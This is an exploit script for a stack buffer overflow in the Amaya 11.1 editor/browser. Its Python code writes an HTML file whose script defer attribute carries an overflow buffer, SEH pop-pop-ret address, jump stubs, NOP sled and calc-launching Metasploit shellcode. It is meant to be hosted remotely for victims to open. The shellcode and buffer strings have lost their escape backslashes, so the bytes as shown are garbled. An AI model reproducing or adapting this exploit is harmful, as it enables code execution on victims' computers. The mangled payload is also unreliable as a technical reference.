
# Title : Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# Published : 2009-03-30
# Author : Encrypt3d.M!nd


# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Original Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note: you need to upload Devil_inside.html to a remote host
# Works on Windows XP SP2
#


# metasploit - run calc.exe

shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x48x49x49x49x49x49x49x51x5ax6ax63"
"x58x30x41x30x50x41x6bx41x41x73x32x41x42x41x32x42"
"x42x30x42x42x58x42x50x38x41x42x75x4dx39x59x6cx4d"
"x38x42x64x33x30x37x70x47x70x4ex6bx52x65x65x6cx6e"
"x6bx41x6cx74x45x70x78x65x51x6ax4fx6cx4bx50x4fx74"
"x58x4cx4bx53x6fx55x70x46x61x4ax4bx72x69x6ex6bx35"
"x64x4cx4bx35x51x48x6ex66x51x4bx70x4ax39x6ex4cx4e"
"x64x4bx70x43x44x66x67x4bx71x4bx7ax44x4dx55x51x58"
"x42x58x6bx6cx34x77x4bx30x54x35x74x37x74x54x35x68"
"x65x4ex6bx31x4fx54x64x47x71x6ax4bx55x36x4ex6bx76"
"x6cx30x4bx4ex6bx51x4fx55x4cx35x51x7ax4bx4ex6bx45"
"x4cx4cx4bx46x61x48x6bx4fx79x53x6cx36x44x54x44x79"
"x53x30x31x6fx30x50x64x4cx4bx33x70x46x50x4fx75x6f"
"x30x70x78x34x4cx4ex6bx57x30x66x6cx4ex6bx50x70x35"
"x4cx4ex4dx6ex6bx52x48x53x38x4ax4bx53x39x4cx4bx4f"
"x70x6ex50x35x50x55x50x53x30x6ex6bx53x58x57x4cx53"
"x6fx74x71x7ax56x51x70x70x56x6fx79x39x68x4cx43x69"
"x50x43x4bx30x50x71x78x78x70x4fx7ax37x74x73x6fx75"
"x38x6cx58x6bx4ex4fx7ax56x6ex73x67x79x6fx4bx57x35"
"x33x35x31x32x4cx45x33x47x70x63")


chars = "x41" * 6887
chars+= "x74x06x41x41"	        # jmp short 06
chars+= "x17x19x10x02"	        # 0x02101917 - pop pop ret in amaya module
chars+= "x68x7fx01x01x7f"		# push 7f01017f
chars+= "x58"				# pop eax
chars+= "x2dx18x69x45x7d"		# sub eax,7a7a0857
chars+= "x50"				# push eax
chars+= "xc3"				# retn
chars+= "x90" * 100
chars+=shellcode

header= ('<script defer="'+chars+'">')

file=open('Devil_inside.html','w')
file.write(header)
file.close()
